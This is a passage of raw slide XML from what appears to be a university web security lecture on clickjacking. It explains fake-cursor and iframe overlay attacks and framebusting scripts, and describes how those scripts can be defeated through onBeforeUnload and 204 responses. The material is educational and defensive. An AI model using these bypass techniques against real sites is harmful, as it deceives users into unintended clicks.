          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4169880"/>
            <a:ext cx="546480" cy="835560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1068" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362320" y="4169880"/>
            <a:ext cx="546480" cy="835560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069" name="TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5826600" y="5530320"/>
            <a:ext cx="2120400" cy="504720"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22595"/>
              <a:gd name="adj2" fmla="val -116521"/>
              <a:gd name="adj3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Fake Cursor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70" name="TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1895040" y="5530320"/>
            <a:ext cx="2073240" cy="504720"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22595"/>
              <a:gd name="adj2" fmla="val -116521"/>
              <a:gd name="adj3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Real Cursor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458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006 -1.48148E-006 L 0.00348 -0.22454 E">
                                      <p:cBhvr>
                                        <p:cTn id="6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006 -1.48148E-006 L 0.00347 -0.22454 E">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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Clickjacking </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1072" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5016240" y="2306880"/>
            <a:ext cx="3200040" cy="1266480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Cambria"/>
              </a:rPr>
              <a:t>Click for a FREE iPad!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073" name="Picture 2" descr="http://chrisblattman.com/files/2011/07/facebook_like_button_big1-300x133.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990720" y="2341080"/>
            <a:ext cx="2857320" cy="1266480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1074" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4169880"/>
            <a:ext cx="546480" cy="835560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5826600" y="5530320"/>
            <a:ext cx="2120400" cy="504720"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22595"/>
              <a:gd name="adj2" fmla="val -116521"/>
              <a:gd name="adj3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Fake Cursor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76" name="TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792800" y="5530320"/>
            <a:ext cx="3300120" cy="504720"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32087"/>
              <a:gd name="adj2" fmla="val -118579"/>
              <a:gd name="adj3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Real Cursor Hidden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77" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758880" y="1334160"/>
            <a:ext cx="5724720" cy="504720"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27891"/>
              <a:gd name="adj2" fmla="val 107770"/>
              <a:gd name="adj3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This is the button that gets clicked!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07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006 -1.48148E-006 L 0.00347 -0.22454 E">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="10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Advanced Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1079" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="947520" y="1719720"/>
            <a:ext cx="7224840" cy="3386160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6095880"/>
            <a:ext cx="8674560" cy="94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Lin-Shung Huang, Alex Moshchuk, Helen J. Wang, Stuart Schechter, and Collin Jackson. 2012. Clickjacking: attacks and defenses. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Proceedings of the 21st USENIX conference on Security symposium</a:t>
            </a:r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 (Security'12). USENIX Association, Berkeley, CA, USA, 22-22.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081" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445320" y="2819520"/>
            <a:ext cx="8229240" cy="106632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Cambria"/>
              </a:rPr>
              <a:t>Malicious site now has access to your webcam!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82" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6081480" y="5373360"/>
            <a:ext cx="2971440" cy="68544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>
            <a:solidFill>
              <a:srgbClr val="71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mbria"/>
              </a:rPr>
              <a:t>Work done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>at CMU!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846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nip Single Corner Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279360" y="1139400"/>
            <a:ext cx="7619760" cy="4904640"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="595A5A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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</a:rPr>
              <a:t>&lt;head&gt; ...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</a:rPr>
              <a:t>&lt;script type="text/javascript"&gt;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</a:rPr>
              <a:t>  flip =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</a:rPr>
              <a:t>  function flipText()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</a:rPr>
              <a:t>   var x = document.getElementById('myid').firstChild;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</a:rPr>
              <a:t>   if(flip == 0) { x.nodeValue = 'Bob'; flip = 1;}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</a:rPr>
              <a:t>   else { x.nodeValue = 'Alice'; flip = 0;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</a:rPr>
              <a:t>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</a:rPr>
              <a:t>&lt;/script&gt;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</a:rPr>
              <a:t>&lt;/head&gt;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</a:rPr>
              <a:t>&lt;body&gt;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</a:rPr>
              <a:t>&lt;a id="myid"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</a:rPr>
              <a:t>   href="javascript:flipText()"&gt;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</a:rPr>
              <a:t>   Alice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</a:rPr>
              <a:t>&lt;/a&gt;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</a:rPr>
              <a:t>&lt;/body&gt;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5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+mj-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Document Object Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3796200"/>
            <a:ext cx="1828440" cy="38052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document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7" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876920" y="4593960"/>
            <a:ext cx="990360" cy="38052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head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8" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6591240" y="4593960"/>
            <a:ext cx="990360" cy="38052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body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9" name="Straight Arrow Connector 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5372280" y="4177440"/>
            <a:ext cx="799920" cy="416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40" name="Straight Arrow Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="4177440"/>
            <a:ext cx="914040" cy="416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41" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7630200" y="5221440"/>
            <a:ext cx="533160" cy="38052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42" name="Straight Arrow Connector 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="4975200"/>
            <a:ext cx="810000" cy="246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43" name="Straight Arrow Connector 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7896960" y="5602680"/>
            <a:ext cx="19440" cy="461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44" name="Rounded Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7250040" y="6064920"/>
            <a:ext cx="1333080" cy="32256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Alice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45" name="Rounded Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5576400" y="5221440"/>
            <a:ext cx="990360" cy="38052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script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46" name="Straight Arrow Connector 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372280" y="4975200"/>
            <a:ext cx="699480" cy="246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arrow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47" name="Straight Arrow Connector 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5753160" y="5602680"/>
            <a:ext cx="318240" cy="461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prstDash val="sysDash"/>
            <a:round/>
            <a:tailEnd type="arrow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48" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086440" y="6064920"/>
            <a:ext cx="1333080" cy="32256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>
            <a:solidFill>
              <a:srgbClr val="A8592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flipText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49" name="Rounded Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="5791320"/>
            <a:ext cx="2514240" cy="645480"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 87990"/>
              <a:gd name="adj2" fmla="val 20094"/>
              <a:gd name="adj3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Edits “Alice” to be “Bob”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126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Clickjacking - Mitigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1084" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905120" y="1295280"/>
            <a:ext cx="5333760" cy="3638160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147320" y="5181480"/>
            <a:ext cx="6857640" cy="83772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Adding a delay between a button appearing and being usable helps prevent Clickjacking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758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Using Frames for Evil</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1087" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609800" y="2989440"/>
            <a:ext cx="4152600" cy="1353600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1088" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609800" y="5016240"/>
            <a:ext cx="4152600" cy="1460160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1089" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609800" y="1189080"/>
            <a:ext cx="4152600" cy="1184400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1090" name="Picture 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="430200" y="1189080"/>
            <a:ext cx="3150360" cy="2010960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Down Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343560" y="2430360"/>
            <a:ext cx="685440" cy="4453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>
            <a:solidFill>
              <a:srgbClr val="71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Down Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332760" y="4425840"/>
            <a:ext cx="685440" cy="4453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>
            <a:solidFill>
              <a:srgbClr val="71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Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3933360" y="1544760"/>
            <a:ext cx="551160" cy="46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>
            <a:solidFill>
              <a:srgbClr val="71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Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885600" y="3429000"/>
            <a:ext cx="3047400" cy="304776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If pages with sensitive buttons can be put in an IFrame, then it may be possible to perform a Clickjacking attack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58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 err="1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Framebusting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="169A48"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1096" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480240" y="1159560"/>
            <a:ext cx="8206200" cy="94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i="1" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria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mbria"/>
              </a:rPr>
              <a:t>is a technique where a page stops functioning when included in a frame.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97" name="Snip Diagonal Corner Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621000" y="2522520"/>
            <a:ext cx="7901280" cy="137124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595A5A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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&lt;script type="text/javascript"&gt;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  if(top != self) top.location.replace(self.location);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&lt;/script&gt;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98" name="Up Arrow Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882000" y="4143600"/>
            <a:ext cx="7379640" cy="209736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If the page with this script is embedded in a frame, then it will escape out of the frame and replace the embedding page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05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Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1945800"/>
            <a:ext cx="2133360" cy="2209320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Don’t roll your own crypto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00" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505320" y="1945800"/>
            <a:ext cx="2133360" cy="2225880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Don’t write your own sanitization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01" name="Right Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438280" y="2666880"/>
            <a:ext cx="914040" cy="766800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38177"/>
              <a:gd name="adj2" fmla="val 50000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102" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2675160"/>
            <a:ext cx="914040" cy="766800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38177"/>
              <a:gd name="adj2" fmla="val 50000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103" name="Rounded Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="1944000"/>
            <a:ext cx="2133360" cy="2209320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Don’t write your own framebusting solution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9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 err="1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Framebusting</a:t>
            </a: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 is Complicated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1105" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3867840" y="2484000"/>
            <a:ext cx="5273280" cy="40356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>
            <a:solidFill>
              <a:srgbClr val="71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Fails if page is embedded two Iframes deep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6" name="Snip Diagonal Corner Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="1257480"/>
            <a:ext cx="4495320" cy="98136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595A5A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if(top.location!=self.location) {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600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>   parent.location=self.location;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1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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07" name="Snip Diagonal Corner Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="3137400"/>
            <a:ext cx="6857640" cy="98136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595A5A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script type="text/javascript"&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  if(top != self) top.location.replace(self.location);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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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08" name="TextBox 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-65160" y="4353840"/>
            <a:ext cx="9583200" cy="40356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>
            <a:solidFill>
              <a:srgbClr val="71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If the embedding page sets the onBeforeUnload event, the script can be blocked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09" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="335160" y="5029200"/>
            <a:ext cx="3447360" cy="1618560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988080" y="4958280"/>
            <a:ext cx="4749120" cy="131544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>
            <a:solidFill>
              <a:srgbClr val="71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mbria"/>
              </a:rPr>
              <a:t>If the embedding page makes lots of requests that return “204 – No Content” responses, we don’t even need the dialog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1" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988080" y="6097680"/>
            <a:ext cx="515556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Rydstedt, Gustav, et al. "Busting frame busting: a study of clickjacking vulnerabilities at popular sites." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>IEEE Oakland Web</a:t>
            </a:r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 2 (2010).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992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 err="1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Framebusting</a:t>
            </a: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 is Complicated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Snip Diagonal Corner Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1265040"/>
            <a:ext cx="8000640" cy="384012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595A5A"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414242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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;style&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>   body { display: none; }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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/style&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> if (self == top) {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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>   document.getElementsByTagName("body")[0]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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>   .style.display = 'block';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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> } else {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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>   top.location = self.location;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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> }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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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14" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6334920"/>
            <a:ext cx="914364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Rydstedt, Gustav, et al. "Busting frame busting: a study of clickjacking vulnerabilities at popular sites." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>IEEE Oakland Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t> 2 (2010).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15" name="Bent-Up Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866960" y="4800600"/>
            <a:ext cx="5638320" cy="1305360"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 38230"/>
              <a:gd name="adj3" fmla="val 37451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Does this work? Who Knows?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16" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276840" y="5202720"/>
            <a:ext cx="8610120" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Javascript-based Framebusting is a just a hack.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Is there a better way?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39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7" name="Picture 2" descr="image"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252440" y="4368600"/>
            <a:ext cx="6447960" cy="2104560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
